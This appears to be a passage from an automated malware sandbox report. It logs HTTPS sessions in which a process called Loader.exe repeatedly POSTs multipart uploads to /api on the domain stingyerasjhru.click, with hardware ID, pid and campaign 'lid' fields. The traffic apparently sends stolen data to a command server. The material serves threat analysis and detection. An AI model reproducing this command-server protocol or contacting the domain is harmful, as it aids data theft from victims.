                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 6b 77 57 6b 44 6b 47 67 78 71 63 71 32 4e 47 4c 31 79 42 58 39 52 57 41 38 31 45 30 39 57 38 73 43 6f 64 4a 64 39 4d 57 33 45 65 36 52 76 51 56 42 50 2f 4b 6d 6a 6a 62 30 38 79 50 63 51 2f 65 45 6f 72 39 53 48 72 6a 4f 57 46 63 68 6b 55 6e 6b 56 57 51 41 35 52 49 37 46 30 57 2f 4e 2f 38 62 49 57 50 31 4e 64 35 41 75 68 5a 33 71 77 4b 4f 2f 59 35 64 31 7a 48 42 6d 33 51 48 64 4d 52 68 6b 2b 4b 4d 30 57 71 68 65 4d 31 33 74 33 4d 69 58 5a 5a 73 68 47 46 35 46 35 46 32 6c 49 6a 47 6f 63 66 65 4d 51 39 38 45 66 4c 53 4c 74 4e 48 4a 37 4b 35 33 76 71 6b 34 75 42 49 42 71 2b 4c 49 58 77 53 6e 7a 79 61 47 49 30 6f 7a 39 46 67 44 66 58 45 73 63 38 73 78 31 56 72 49 65 6a 65 35 75 64 7a 64 6b 34 45 72 42 5a 67 75 38 45 49 37 51 72 64 45 6e 54 55 69 2b 51 42 4a 34
                                                                                                              Data Ascii: kwWkDkGgxqcq2NGL1yBX9RWA81E09W8sCodJd9MW3Ee6RvQVBP/Kmjjb08yPcQ/eEor9SHrjOWFchkUnkVWQA5RI7F0W/N/8bIWP1Nd5AuhZ3qwKO/Y5d1zHBm3QHdMRhk+KM0WqheM13t3MiXZZshGF5F5F2lIjGocfeMQ98EfLSLtNHJ7K53vqk4uBIBq+LIXwSnzyaGI0oz9FgDfXEsc8sx1VrIeje5udzdk4ErBZgu8EI7QrdEnTUi+QBJ4
                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 41 74 4b 71 63 71 77 64 63 79 64 33 64 6b 34 45 62 42 5a 6c 4c 34 63 4f 36 4e 33 49 68 32 44 43 33 7a 51 43 64 59 45 6b 77 76 7a 4d 33 71 43 68 36 49 2b 32 39 72 31 70 30 46 49 37 68 53 4a 2b 51 5a 62 34 32 38 73 49 72 34 79 62 73 55 4c 6b 69 47 47 48 72 64 4e 43 75 65 53 37 32 4f 56 2f 4d 47 4a 62 55 33 35 57 36 62 35 55 6e 69 6b 4e 32 38 59 77 46 30 2f 35 78 62 64 41 6f 73 50 39 69 78 4f 74 34 65 67 50 4a 66 39 7a 49 39 6a 41 72 42 5a 69 72 34 63 4f 2b 56 7a 50 78 47 50 41 6a 50 46 41 64 64 48 79 30 69 36 54 52 7a 6e 69 36 55 72 32 4e 4c 4d 31 57 5a 4d 38 46 6d 5a 73 46 30 37 38 6a 6c 33 54 38 35 46 62 59 4a 44 6b 45 43 47 47 71 59 4c 52 37 47 4a 36 41 58 72 38 4e 6d 65 63 45 47 38 4b 49 76 36 55 6d 37 6e 61 53 67 69 76 69 68 74 78 51 76 54 52 62 51 65
                                                                                                              Data Ascii: AtKqcqwdcyd3dk4EbBZlL4cO6N3Ih2DC3zQCdYEkwvzM3qCh6I+29r1p0FI7hSJ+QZb428sIr4ybsULkiGGHrdNCueS72OV/MGJbU35W6b5UnikN28YwF0/5xbdAosP9ixOt4egPJf9zI9jArBZir4cO+VzPxGPAjPFAddHy0i6TRzni6Ur2NLM1WZM8FmZsF078jl3T85FbYJDkECGGqYLR7GJ6AXr8NmecEG8KIv6Um7naSgivihtxQvTRbQe


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.11.2049757172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:30 UTC277OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=HYH221AA6
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20490
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:30 UTC15331OUTData Raw: 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                              Data Ascii: --HYH221AA6Content-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--HYH221AA6Content-Disposition: form-data; name="pid"2--HYH221AA6Content-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--HYH221AA6Content-D
                                                                                                              2024-12-31 16:42:30 UTC5159OUTData Raw: 9a d6 c6 af b2 d2 c3 4f 74 3a 9a 3a 3e 33 de c8 f0 99 53 73 e3 e7 d9 70 93 b2 13 ce 1d 3b 9b 5e 5e 9e 53 4e a6 e7 ce 56 87 79 72 93 81 b7 6e 36 61 76 88 9f 71 a0 bf ad 5a e8 36 1a 36 a9 1b 99 b3 79 00 7b 16 0a ba e5 b4 8f 87 af 4d 07 78 8e 3e e3 6b 95 4c 36 90 92 a9 a3 b1 52 49 d4 c6 23 b1 70 7e 3e 15 79 ec fc dc fc 62 64 45 bb 1c f1 86 96 72 41 c9 46 b4 b8 9a 8c 11 92 62 dd b1 64 82 ad 90 34 9b 76 8b b2 49 b7 4c 5c c9 c6 b2 b1 c8 f6 e1 e8 f4 71 db aa 55 97 58 ad 90 63 47 1c 3f c6 0a dd 19 e2 96 73 6f ea 49 c6 67 1f b5 d8 a8 84 8f 5d 59 a2 38 35 93 df 86 77 ae 5c 97 c8 33 35 b7 7c 86 b0 7e 5e 8e 0d 4a b3 b1 4c 2a ad a4 f3 85 38 ab 73 0a 29 76 ee 2c 51 b3 f1 44 56 a5 4a ba 98 49 25 e2 e9 44 42 8d 26 c6 d9 ac 64 8e ef 5e 1e e4 b9 70 b6 95 80 8d 93 b6 25 df
                                                                                                              Data Ascii: Ot::>3Ssp;^^SNVyrn6avqZ66y{Mx>kL6RI#p~>ybdErAFbd4vIL\qUXcG?soIg]Y85w\35|~^JL*8s)v,QDVJI%DB&d^p%
                                                                                                              2024-12-31 16:42:31 UTC1145INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:30 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=k32mkomm6hddj3eb15june2abc; expires=Sat, 26 Apr 2025 10:29:09 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J46yaisDFXJjGnK4ukKAugATr%2F0O%2BioR5lIzrDmjjLUJe5x2KJov%2BIPBIw5%2BbrMwKVK9iMeY1kmEWBWzbZVKAkLkMDjgLh4u8n39RKZfiJwsRI1dcxac8Di2Re4QG%2FNSJrFBvhWZeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb922a98609aa-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=129395&min_rtt=129321&rtt_var=27403&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2852&recv_bytes=21447&delivery_rate=29553&cwnd=252&unsent_bytes=0&cid=8c2382703abc22d1&ts=920&x=0"
                                                                                                              2024-12-31 16:42:31 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a
                                                                                                              Data Ascii: 12ok 102.129.153.238
                                                                                                              2024-12-31 16:42:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.11.2049758172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:31 UTC283OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=VS3FTQUB1ATL6UQ
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 10923
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:31 UTC10923OUTData Raw: 2d 2d 56 53 33 46 54 51 55 42 31 41 54 4c 36 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 56 53 33 46 54 51 55 42 31 41 54 4c 36 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 53 33 46 54 51 55 42 31 41 54 4c 36 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 56 53
                                                                                                              Data Ascii: --VS3FTQUB1ATL6UQContent-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--VS3FTQUB1ATL6UQContent-Disposition: form-data; name="pid"2--VS3FTQUB1ATL6UQContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--VS
                                                                                                              2024-12-31 16:42:32 UTC1140INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:32 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=nc56btvp43vrof822k1uk4ud5h; expires=Sat, 26 Apr 2025 10:29:10 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78m6IWfFn12JWA6wWB2ne3Nr5MIq%2FfffJin00kOYvR57RDRcNvfgN0Yu7VJ1ee%2BHO73S6jA3C7oHN1qFkdXjPifUvKLfk7hI4ugsUusHwV%2FbwPkVEYbj1bxOVWqWxAu5tP0EwnZHQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb92b4d97a530-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=129109&min_rtt=128929&rtt_var=27478&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2852&recv_bytes=11864&delivery_rate=29572&cwnd=252&unsent_bytes=0&cid=3a68ac95c395a8e5&ts=867&x=0"
                                                                                                              2024-12-31 16:42:32 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a
                                                                                                              Data Ascii: 12ok 102.129.153.238
                                                                                                              2024-12-31 16:42:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.11.2049759172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:32 UTC276OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=633ISA4X
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20510
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:32 UTC15331OUTData Raw: 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                              Data Ascii: --633ISA4XContent-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--633ISA4XContent-Disposition: form-data; name="pid"3--633ISA4XContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--633ISA4XContent-Dispo
                                                                                                              2024-12-31 16:42:32 UTC5179OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc a6 e8 30 bd ee bb 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: \ot^:):Ln`X6Eusazw0
                                                                                                              2024-12-31 16:42:33 UTC1139INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:33 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=jk7mejqs3aa2ski013e473q3ns; expires=Sat, 26 Apr 2025 10:29:12 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YV2UsH3B0P8D3xJxNbQg0vFBMVduHUUHwV90jbtXzRk9w7mhQ1qPiEIn8nBVG1Vdf10Jh56LhMQKJze55bSOxKSwxYSpZyA1CCtENkBFoYtW1nafTRdksh6C7aNuv%2B8%2FyfClHW58YA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb9342c94d9e1-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=128750&min_rtt=128444&rtt_var=27568&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2853&recv_bytes=21466&delivery_rate=29592&cwnd=252&unsent_bytes=0&cid=4aee51b3c61accd0&ts=744&x=0"
                                                                                                              2024-12-31 16:42:33 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a
                                                                                                              Data Ascii: 12ok 102.129.153.238
                                                                                                              2024-12-31 16:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.11.2049760172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:34 UTC280OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=KZ6WSVI09ZW9F
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1237
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:34 UTC1237OUTData Raw: 2d 2d 4b 5a 36 57 53 56 49 30 39 5a 57 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 4b 5a 36 57 53 56 49 30 39 5a 57 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 5a 36 57 53 56 49 30 39 5a 57 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 4b 5a 36 57 53 56 49 30
                                                                                                              Data Ascii: --KZ6WSVI09ZW9FContent-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--KZ6WSVI09ZW9FContent-Disposition: form-data; name="pid"1--KZ6WSVI09ZW9FContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--KZ6WSVI0
                                                                                                              2024-12-31 16:42:35 UTC1148INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:35 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=i0do7nic1t3j1urgdnkra3klnb; expires=Sat, 26 Apr 2025 10:29:14 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzO%2FIdgUBerfEy%2BZA4biA2UORXVwzzXjvfXzoUDz%2F%2FjWtwD%2BvLjZvY5zb91iqfdWdOZpAPbqEvkTegg31eztloqSg%2BGY4klGzOV8QcHZmaX076vVUnX49OrhSjX4ewhbs%2FcEnhasiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb93e7e9ba4b8-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=129388&min_rtt=129291&rtt_var=27420&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2852&recv_bytes=2153&delivery_rate=29547&cwnd=252&unsent_bytes=0&cid=7d4d9ddd352e853b&ts=699&x=0"
                                                                                                              2024-12-31 16:42:35 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a
                                                                                                              Data Ascii: 12ok 102.129.153.238
                                                                                                              2024-12-31 16:42:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.11.2049761172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:36 UTC281OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=35BJGYNIRP2
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1079788
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43
                                                                                                              Data Ascii: --35BJGYNIRP2Content-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--35BJGYNIRP2Content-Disposition: form-data; name="pid"1--35BJGYNIRP2Content-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--35BJGYNIRP2C
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 4f 05 25 86 41 c9 16 b3 93 8d 09 49 43 d4 db b3 4f 97 fb 34 47 6a f8 5e e7 70 85 7e 9f 24 bd 43 8e 21 27 ca fb 7b 59 a7 af df 21 52 51 b9 8d 03 4b 13 a3 9f 78 59 11 f1 2c 22 ec c8 fa a8 28 5f a9 d8 6e 77 b9 02 fe 5a d5 35 08 5f 87 f2 ab dd f2 00 65 89 d1 30 f4 c9 53 b9 a5 3b a9 5c 12 30 10 e8 7d 8e 71 64 90 48 43 86 bd 4d 9d b9 66 0f 0d ba 79 f9 07 de e1 a2 b8 8c cb ee 2b 29 62 37 51 ad 6f 0d 5c c4 be 50 2e f7 6f 3d 92 b6 bb ae 51 11 5b 60 16 fd 63 39 f6 25 eb 16 10 2c 2e 42 fe 3e b5 d8 34 3c 85 ce c5 33 13 06 8d 87 f6 2a c7 38 7b 97 0a 04 57 7f 01 05 63 0f d2 8b 19 2c ee 99 cd 4f 9b ac 0b c0 76 bf 08 51 f5 0f 89 ed 01 28 b1 09 d8 be bf 98 3e 4c 31 3f 47 17 21 04 c5 04 81 a9 fc 0c d3 68 7a 86 ee 62 95 09 b0 ef f9 01 7b 95 50 82 f5 14 8c 1a 11 73 12 44 b7
                                                                                                              Data Ascii: O%AICO4Gj^p~$C!'{Y!RQKxY,"(_nwZ5_e0S;\0}qdHCMfy+)b7Qo\P.o=Q[`c9%,.B>4<3*8{Wc,OvQ(>L1?G!hzb{PsD
                                                                                                              2024-12-31 16:42:36 UTC15331OUTData Raw: 38 03 a3 7c c2 fb ed 3a c0 9e 53 75 1d 05 26 63 c9 77 62 ab d2 d4 4d f6 c5 e9 19 9b b9 56 35 c5 4e 1e 7b 37 c3 81 38 d9 02 d3 a4 bc 5a 4e 19 2f 6e 30 d6 ef 20 ce 7a 9e 53 66 b9 b6 68 7d 5a 6f 3d 53 f3 e0 4a 40 06 72 2e 4d e8 16 79 a7 be a9 04 95 de d0 14 dd 35 10 4b 98 cb 20 4f c4 d8 da c5 dd 44 ea 94 4f 01 44 75 b8 8c 00 24 de 1e da ba e3 ba ad ad f0 d6 1c f2 1f 79 92 2a c0 57 1e 91 45 ef fe f7 fa 06 47 00 3a 9e 10 7e 63 fa bf f6 79 13 db fb 4f 76 31 fe e5 3f 93 5b ae f1 3d 6c f3 44 86 0c f0 f5 5e 3d 7a 29 b4 59 63 e5 23 af d9 58 68 5b d1 23 1f 56 9f 82 52 b4 6b f3 60 1c 03 d2 5a 88 dc 8f d6 5b 10 6a 48 8f cf 3c 5e 8c 2e 27 ad bc 75 14 48 43 1a 7f 7e cb 80 c7 5d 00 72 50 ed ef 02 57 dd 8d 3d 8b 2a a8 c6 4d c4 2d e7 ac 33 c1 42 71 4e c9 80 5c 46 45 65 9f
                                                                                                              Data Ascii: 8|:Su&cwbMV5N{78ZN/n0 zSfh}Zo=SJ@r.My5K ODODu$y*WEG:~cyOv1?[=lD^=z)Yc#Xh[#VRk`Z[jH<^.'uHC~]rPW=*M-3BqN\FEe
